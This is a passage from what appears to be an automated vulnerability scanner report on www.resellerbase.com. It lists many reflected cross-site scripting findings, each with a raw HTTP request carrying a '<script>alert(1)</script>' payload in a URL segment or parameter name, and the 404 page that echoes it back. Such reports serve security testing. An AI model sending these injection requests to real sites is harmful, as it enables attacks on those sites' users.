This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/search.php?keyword=search...&Submit3=Search&opt=2696a0<a>18c5d6f0bea HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?keyword=search...&Submit3=Search&opt=2696a0<a>18c5d6f0bea was not found on this server.</p>
...[SNIP]...

2.702. http://www.resellerbase.com/communication/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f396<script>alert(1)</script>63888aa7d91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication7f396<script>alert(1)</script>63888aa7d91/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7f396<script>alert(1)</script>63888aa7d91/themes/ was not found on this server.</p>
...[SNIP]...

2.703. http://www.resellerbase.com/communication/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38022<script>alert(1)</script>7656fe4ecf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes38022<script>alert(1)</script>7656fe4ecf3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes38022<script>alert(1)</script>7656fe4ecf3/ was not found on this server.</p>
...[SNIP]...

2.704. http://www.resellerbase.com/communication/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 40970<script>alert(1)</script>8e2762366c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/?40970<script>alert(1)</script>8e2762366c0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/?40970<script>alert(1)</script>8e2762366c0=1 was not found on this server.</p>
...[SNIP]...

2.705. http://www.resellerbase.com/communication/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6396f<script>alert(1)</script>03e84233af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication6396f<script>alert(1)</script>03e84233af4/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication6396f<script>alert(1)</script>03e84233af4/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.706. http://www.resellerbase.com/communication/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ec34<script>alert(1)</script>2ede4c0ad68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes6ec34<script>alert(1)</script>2ede4c0ad68/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes6ec34<script>alert(1)</script>2ede4c0ad68/kosmos/ was not found on this server.</p>
...[SNIP]...

2.707. http://www.resellerbase.com/communication/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c275d<script>alert(1)</script>fc8b05923cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosc275d<script>alert(1)</script>fc8b05923cb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosc275d<script>alert(1)</script>fc8b05923cb/ was not found on this server.</p>
...[SNIP]...

2.708. http://www.resellerbase.com/communication/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d2750<script>alert(1)</script>681862e7da8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/?d2750<script>alert(1)</script>681862e7da8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/?d2750<script>alert(1)</script>681862e7da8=1 was not found on this server.</p>
...[SNIP]...

2.709. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e70b1<script>alert(1)</script>ee0525367e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione70b1<script>alert(1)</script>ee0525367e/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione70b1<script>alert(1)</script>ee0525367e/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.710. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af56e<script>alert(1)</script>f052d75a5be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesaf56e<script>alert(1)</script>f052d75a5be/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesaf56e<script>alert(1)</script>f052d75a5be/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.711. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dcca3<script>alert(1)</script>aee57651d09 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosdcca3<script>alert(1)</script>aee57651d09/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosdcca3<script>alert(1)</script>aee57651d09/images/ was not found on this server.</p>
...[SNIP]...

2.712. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98671<script>alert(1)</script>4cfe29be39c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images98671<script>alert(1)</script>4cfe29be39c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images98671<script>alert(1)</script>4cfe29be39c/ was not found on this server.</p>
...[SNIP]...

2.713. http://www.resellerbase.com/communication/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c2ff5<script>alert(1)</script>a6ad323614a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/?c2ff5<script>alert(1)</script>a6ad323614a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/?c2ff5<script>alert(1)</script>a6ad323614a=1 was not found on this server.</p>
...[SNIP]...

2.714. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6630<script>alert(1)</script>a807db9e4f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationb6630<script>alert(1)</script>a807db9e4f3/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationb6630<script>alert(1)</script>a807db9e4f3/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.715. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3640b<script>alert(1)</script>93e3e9440be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes3640b<script>alert(1)</script>93e3e9440be/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes3640b<script>alert(1)</script>93e3e9440be/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.716. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f2cd<script>alert(1)</script>900606f84fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos5f2cd<script>alert(1)</script>900606f84fc/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos5f2cd<script>alert(1)</script>900606f84fc/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.717. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c210a<script>alert(1)</script>be7096ec842 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagesc210a<script>alert(1)</script>be7096ec842/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagesc210a<script>alert(1)</script>be7096ec842/folder.gif was not found on this server.</p>
...[SNIP]...

2.718. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88053<script>alert(1)</script>9875842cd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/folder.gif88053<script>alert(1)</script>9875842cd4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/folder.gif88053<script>alert(1)</script>9875842cd4 was not found on this server.</p>
...[SNIP]...

2.719. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20c40<script>alert(1)</script>dcef60a7b8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/folder.gif?20c40<script>alert(1)</script>dcef60a7b8a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/folder.gif?20c40<script>alert(1)</script>dcef60a7b8a=1 was not found on this server.</p>
...[SNIP]...

2.720. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58d4f<script>alert(1)</script>e38b449724e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication58d4f<script>alert(1)</script>e38b449724e/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication58d4f<script>alert(1)</script>e38b449724e/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.721. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f5a6f<script>alert(1)</script>da2b24e53ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

